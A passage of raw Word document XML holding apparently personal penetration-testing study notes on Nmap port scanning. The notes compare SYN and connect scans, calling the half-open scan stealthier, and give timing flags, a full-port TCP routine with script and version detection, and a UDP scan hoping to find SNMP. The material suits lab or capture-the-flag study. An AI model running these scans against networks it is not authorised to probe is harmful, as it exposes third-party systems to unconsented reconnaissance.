      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TCP vs. SUDO:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, if you run as root/administrator, Nmap prefers SYN scan (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), which is also called a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">half‑open scan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. It only sends a TCP SYN packet and doesn’t complete the handshake. This is faster and stealthier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run without root privileges, Nmap falls back to a TCP connect scan (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), which uses the operating system’s connect() call to complete the full 3‑way handshake (SYN → SYN/ACK → ACK). That’s slower and easier to detect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> explicitly tells Nmap: do a TCP Connect scan, even if SYN scan is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's going too slow, add this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--min-rate 10000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">send at least 10,000 packets per second</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reason</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="609"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Helps us understand why ports are returned as open, open|filtered, or closed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My routine:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find all the ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sC -sV -p [insert ports from previous scan] [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV -p 22,80,3000 [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D6">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maybe try this one for TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n -sC -sV -p- $IP --open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as it defaults to the faster half-open SYN scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ignore ping and assume it is up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to never do DNS resolution, which slows things down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this means you don't see hostnames, which might be important so think about deleting this flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MOST importantly the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">argument to only apply scripts and version scans to find open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -sC -sV -p- $IP --open</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="947"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one has DNS resolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Maybe try this one for UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -Pn -n $IP -sU --top-ports=100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ideally we find something like Simple Network Management Protocol (SNMP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to never do DNS resolution, which slows things down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1249"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But this means you don't see hostnames, which might be important so think about deleting this flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -Pn [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000028E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="996"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sC -sV [IP]</w:t>
      </w:r>
    </w:p>
